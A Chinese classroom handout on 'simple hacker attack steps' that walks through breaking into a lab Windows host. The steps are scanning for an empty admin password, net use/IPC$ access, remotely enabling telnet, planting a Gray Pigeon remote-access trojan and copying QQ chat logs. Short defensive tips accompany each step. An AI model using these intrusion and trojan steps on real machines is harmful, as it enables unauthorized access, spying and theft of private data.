简单黑客攻击步骤详解.docx
《简单黑客攻击步骤详解.docx》由会员分享,可在线阅读,更多相关《简单黑客攻击步骤详解.docx(13页珍藏版)》请在冰豆网上搜索。
简单黑客攻击步骤详解
网络攻防技术初步
1、简单密码破解:
一台在网络上的计算机从理论上讲可以相应任何人的操作请求,为了确保计算机所有者的权益,设计者们为计算机启用了密码保护,只有那些通过密码验证的用户才能够拥有操作计算机的权限,黑客们为了非法获取计算机的操作权限,其第一步往往就是获取用户密码。
很多人使用电脑时习惯不设置密码或设置一些简单密码比如“111111”、“123456”等等,利用一些工具比如流光可以轻松的破解这些密码,由于时间的关系我们在这里利用Xscan这个网管人员的好帮手来达到这一目的,通过这样一个实例让学员明白不设置密码或设置简单密码的坏处。
下面让我们来通过实例观察一下如何做到这一点。
通过鼠标左键双击图一所示的小图标,我们就启动了Xscan,启动界面如图二所示,我们利用鼠标左键单击如图二右上角被黑色方框围住的图形按钮,设置扫描参数。
图一启动Xscan图标
在新弹出的菜单中(图三),此时我们假定一台IP地址为192.168.0.34的计算机设置了简单密码,那么我们就在“指定IP范围:
”下的文字栏中输入“192.168.0.34”,并在左上角点击“全局设置”前方的小“+”号,在新弹出的菜单中点击“扫描模块”,设置扫描参数如图四所示。
图二启动Xscan后的样子
图三指定IP地址范围
设置完毕后点击“确定”按钮,然后回到图二所示的界面,点击左上角的“
”按钮,即可启动扫描。
扫描完毕后,Xscan会自动的把扫描结果生成一张网页格式的报表,翻到网页的最后部分,仔细观察图五中被黑色粗线条标示出的部分,我们发现这台计算机的超级管理员帐户(administrator)居然没有设置任何密码。
至此,我们就成功的获取了IP地址为192.168.0.34的这台计算机的用户名和密码。
黑客攻击过程中最重要的一步已经轻松越过。
图四Xscan设置参数
图五超级帐户的密码没有设置
小知识:
Xscan实际上是一个网络管理工具,能够帮助网管人员扫描网络,分析漏洞所在。
192.168.0.34如果设置一些简单密码如“111111”、“123456”,Xscan一样可以找出来,至于复杂一点的密码,只能通过流光软件暴力破解了,如果想让流光破解不了,你要确保你的密码足够复杂,至少八位以上。
2、创建超级连接:
当黑客们获取了用户密码之后,他们需要创建一条具有无限权限的超级链接通道。
此后的攻击活动将通过这条通道进行。
下面,我们来详细的讲解如何建立这条通道
点击计算机左下角的“开始”按钮,在新弹出的菜单中点击“运行”,在“打开”后面的文字栏中输入“cmd”然后点击“确定”,我们就进入了命令行界面,整个过程如图六、图七所示。
图六运行界面
图七命令行界面
在这里为了操作方便,我们输入“cd\”命令敲击键盘上的“Enter”(回车键)回到根盘符。
输入命令“netuse\\192.168.0.34\ipc$“”/user:
administrator”再回车,系统就会提示“命令成功完成”。
至此,一条超级通道就被我们创建了,我们远程的获得了192.168.0.34这台主机的管理员权限。
过程如图八所示,为了让大家更清晰的看到效果,我对命令行界面的显示做了设置,这里不再详述。
图八创建超级通道的过程
小知识:
命令中””所在位置既是用户的密码,如果设置了密码比如“123456”,只需要在””对应的位置输入123456即可,记得要去掉””。
如果我们通过其他渠道获取了某台计算机超级管理员的密码,在这里把IP地址(也就是那一串192.168.0.34)换成你所知道密码的那台计算机的IP地址,密码输入到””对应的地方,一样可以创建超级通道。
3、开启telnet服务:
获取了管理员权限之后,黑客们更喜欢利用超级链接通道使用SC命令强行开启TELNET服务,从而能够远程登录至被黑掉的计算机,模拟本机操作,这样操作起来更轻松,性能也更强大,是黑客们地惯用手法。
下面我们就来讲解如何开启telnet服务。
还是在刚才的命令符提示下,我们输入命令“sc\\192.168.0.34qctlntsvr”,这条命令是查询目标主机的服务状态的,根据反馈回来的信息发现目标主机的telnet服务被禁用,禁用标识在图九的黑色下划线处。
图九服务状态显示“DISABLED”,被禁用
此时我们输入“sc\\192.168.0.34configtlntsvrstart=auto”回车,系统会提示我们“[SC]ChangeServiceConfigSUCCESS”,这代表着服务被允许使用了,然后我们再输入“sc\\192.168.0.34starttlntsvr”,系统会提示我们服务处于启用状态,效果如图十所示。
注意黑色粗线条标示的地方。
图十两条命令的效果提示
至此,192.168.0.34就可以被telnet了,继续输入“telnet192.168.0.34”之后回车,然后根据提示输入“y”回车,我们就进入了登录界面,在“login”提示处输入“administrator”然后回车,系统会出现一行“password”的提示,这是在要求你输入密码,由于192.168.0.34的超级管理员密码为空,我们直接回车(图十一),就可以进入192.168.0.34的虚拟本机操作界面了,注意观察图十二左上角被黑色线条标示的地方,系统明确的告诉我们,现在正在远程操作192.168.0.34这台主机。
图十一telnet界面输入用户名和密码
图十二以命令行方式远程操作192.168.0.34
小知识:
telnet是一个功能非常强大的远程管理工具,设计它的本意是为了让网络管理员们免去跋山涉水之苦,可以坐在自己的办公室里很轻松的管理远方的服务器,但是由于网络的不安全性,这个服务在现在的操作系统里,默认情况下是被关闭的。
如果你想远程管理自己的计算机,可以在本机上按照上面的步骤输入类似的命令就可以开启了,注意设置一个足够复杂的密码,让别人没办法轻易地破解。
另外在我们输入密码的时候会发现计算机不会有任何提示,这是一个古老的安全法则,密码应该是不可见的,而且具体长度也不应显示出来,防止有心人通过密码长度猜出密码。
4、利用灰鸽子种下木马从而开启图形化控制界面:
命令行界面虽然速度很快,但是操作起来非常麻烦,几百条操作命令非常考验黑客们的记忆力,所以,黑客们想出了远程图形化控制的方法,我们在这里选用大名鼎鼎的黑客软件灰鸽子,让大家体会一下当黑客的强大。
首先我们需要获取灰鸽子软件,这种东东用XX一搜一大堆,选一个看上去可靠的下载下来吧。
我们启动灰鸽子,先来制作一个种子,选择“文件”→“配置服务程序”,在新菜单(图十三)中指定控制端的IP地址(当然是我自己的计算机IP192.168.0.203了,图片上方黑色线条所示),指定保存地点和保存文件名(图片下方黑色线条所示),点击“生成服务器”即可完成。
图十三用灰鸽子生成种子
种子制作好了,接下来需要把种子拷贝至目标主机,先在192.168.0.34下输入“netshare”,观察一下他的共享设置(图十四)。
哈!
这个菜鸟,简直不设防嘛!
重要的C盘都共享成C$了。
图十四在远程主机上观察共享情况
不要客气,再新建一个命令行界面(回去看图六),输入“netusez:
\\192.168.0.34\c$”,这句命令相当于是把192.168.0.34主机的C盘映射到本机的Z盘,然后执行命令“copyf:
\公开课\temp\setup.exez:
”(图十五)。
图十五种子已经拷贝到目的主机了
然后在已经telnet到192.168.0.34的那个命令界面去观察一下,很明显已经拷贝成功了(图十六黑色箭头所指),输入“setup”回车,我们就已经把种子种上了。
图十六种子已经拷贝至目的主机了
当种下木马后,回来再用灰鸽子看一下,已经找到了(图十七)。
图十七受害者上线了
此时我们点击一下受害者主机,选择“捕获屏幕”按钮,看看会有什么情况出现?
受害者的屏幕显示在我们面前,他正在干什么一清二楚啊!
操作如图十八所示。
图十八用灰鸽子观察受害者屏幕
通过这个例子我们知道,黑客们可以轻易的观察用户们正在干什么,一些私密信息将会很轻松的被黑客得到。
小知识:
由于灰鸽子太有名了,所以现在很多的杀毒软件都对它做出了专门的防范,只要我们安装正版杀毒软件并且及时升级,就可以有效地防范灰鸽子的入侵。
另外灰鸽子本身有众多的改版,一些黑客高手利用黑客菜鸟们急于求成的心态,喜欢在灰鸽子软件上附加一些后门软件,那些黑客菜鸟们经常发现还没有黑了别人,自己已经成为了别人盘子里的菜。
做完这个课程,我一定要把我的系统重新安装一下,因为我不能确保我用的灰鸽子就是安全的。
可以利用“netsharec$/del”命令删除共享盘符。
5、破解QQ聊天记录:
现在的QQ由于提供了密码保护,所以很难再被盗取,有些人习惯通过QQ聊一些比较私密、比较敏感的话题,这种行为是不合适的,黑客们利用一些软件可以轻易地破解聊天记录,在里面寻找他们感兴趣的信息。
一般而言,腾讯公司的QQ软件默认情况下安装在C:
\programfiles文件夹下,利用此前的net和copy命令,我们可以很轻松的把这些文件夹拷贝到本机,此时我们所需要做的就是找一款QQ聊天记录查看器,执行它并且选定目录就可以了。
以下是具体操作。
首先,笔者手头有一款QQ聊天记录查看器,启动后如图十九所示。
图十九QQ聊天记录查看器
图二十点击查看后看到的聊天信息
通过这个软件我们可以轻易的盗取别人的聊天记录,如果在这些聊天记录里有敏感信息,那么失密是必然的。
图二十是点击了查看之后的界面,笔者在这里贡献了自己的聊天记录,做了一些隐密性处理。
小知识:
现在的解密技术实在可怕,那些喜欢在公共场合使用QQ的人们切记,聊完之后记得把自己的聊天记录销毁,这样能有效地保护自己的隐私不被他人侵犯。
6、Messenger通讯的趣味实验
计算机操作系统里有一个小小的通讯服务,如果我们开启了它,不用那些聊天软件也可以实现聊天功能,下面我们就做一下这个实验。
右键点击“我的电脑”,在弹出的菜单中选择“管理”,在弹出的“计算机管理”中选择相应选项如图二十一。
注意两个黑色箭头的指向。
图二十一计算机管理界面内的服务界面
双击右方箭头所指向的“Messenger”,在新弹出的界面中把启动类型从“已禁用”改为“手动”(如图二十二)后点击“应用”按钮,此时“启动”按钮会变成可点击状态,点击“启动”按钮,我们的初期工作就做完了。
接下来另选一台计算机,启动命令行界面(图六),输入命令“netsend192.168.0.203你好,菜鸟。
”再回车,我的计算机上就出现了一个聊天窗口,如图二十三和二十四。
图二十二修改服务的启动类型
图二十三向主机192.168.0.203发送消息
图二十四主机192.168.0.203接收到的消息
小知识:
这个服务自从开启了之后,聊天通讯是方便多了,但是有些不法分子利用这个服务发送大量的垃圾广告。
所以,我们还是把它关上的好。
升级会员 